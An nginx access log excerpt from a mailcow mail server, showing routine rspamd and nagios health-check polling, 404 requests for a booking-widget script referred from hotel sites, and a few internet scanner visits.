| fd4d:6169:6c63:6f77::d - - [21/May/2024:23:33:53 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:33:53 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:33:58 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 87.237.172.74 - - [21/May/2024:23:34:06 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.central-wolter.ch/" "Mozilla/5.0 (Linux; Android 10; CLT-L29 Build/HUAWEICLT-L29; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/124.0.6367.179 Mobile Safari/537.36" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:34:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:34:28 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:34:32 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:34:50 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:34:50 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:35:05 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:35:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:35:15 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:35:35 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:35:35 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:35:55 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:36:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:36:16 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:36:16 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:36:18 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:36:32 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:36:51 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:36:51 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:37:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:37:23 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:37:28 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:37:46 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:37:46 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:37:59 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:38:06 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:38:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:38:43 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:38:43 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:38:50 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:39:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:39:16 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:39:33 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:39:41 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:39:41 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:40:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:40:11 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:40:22 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:40:25 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:40:25 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:40:58 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:41:04 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:41:05 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:41:05 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:41:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 192.241.203.31 - - [21/May/2024:23:41:49 +0200] "MGLNDD_94.130.79.66_443" 400 150 "-" "-" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:41:50 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:41:50 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:41:56 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:42:05 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:42:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:42:44 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:42:44 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:42:48 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:42:48 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:43:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:43:38 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:43:39 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:43:39 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:44:03 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:44:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:44:21 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:44:33 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:44:33 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:44:38 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 107.165.172.167 - - [21/May/2024:23:44:39 +0200] "GET /api/liverate/public/scripts/api.be.synxis.js HTTP/2.0" 404 167 "https://be.synxis.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4691.0 Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:44:58 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:45:07 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:45:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:45:21 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:45:22 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 167.94.145.97 - - [21/May/2024:23:45:26 +0200] "GET / HTTP/1.1" 200 26486 "-" "-" nginx-mailcow-1 | 167.94.145.97 - - [21/May/2024:23:45:29 +0200] "GET / HTTP/1.1" 200 7064 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" nginx-mailcow-1 | 167.94.145.97 - - [21/May/2024:23:45:29 +0200] "GET /favicon.png HTTP/1.1" 200 15428 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" nginx-mailcow-1 | 167.94.145.97 - - [21/May/2024:23:45:29 +0200] "GET /favicon.ico HTTP/1.1" 404 146 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:45:48 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:45:50 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:45:57 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:45:57 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:46:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:46:28 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:46:28 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:46:32 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:46:35 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:47:03 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:47:04 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:47:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:47:21 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:47:21 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:47:47 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:47:51 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:48:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:48:17 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:48:17 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:48:26 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:48:48 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:49:02 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:49:02 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:49:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:49:25 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:49:39 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:49:40 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:49:59 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:50:00 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:50:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:50:16 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:50:16 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:50:37 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:51:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:51:15 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:51:15 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:51:15 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:51:23 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:52:03 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:52:03 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:52:04 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:52:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:52:22 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:52:48 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:52:48 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:52:56 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:53:06 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:53:09 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:53:24 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:53:24 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:53:26 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 185.224.128.43 - - [21/May/2024:23:53:49 +0200] "GET / HTTP/1.1" 200 7064 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:54:00 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:54:00 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:54:04 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:54:04 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:54:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:54:39 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:54:39 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:55:02 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:55:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:55:11 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:55:17 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:55:17 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:55:56 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:56:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:56:12 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:56:13 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:56:13 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:56:39 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:56:54 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:57:10 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 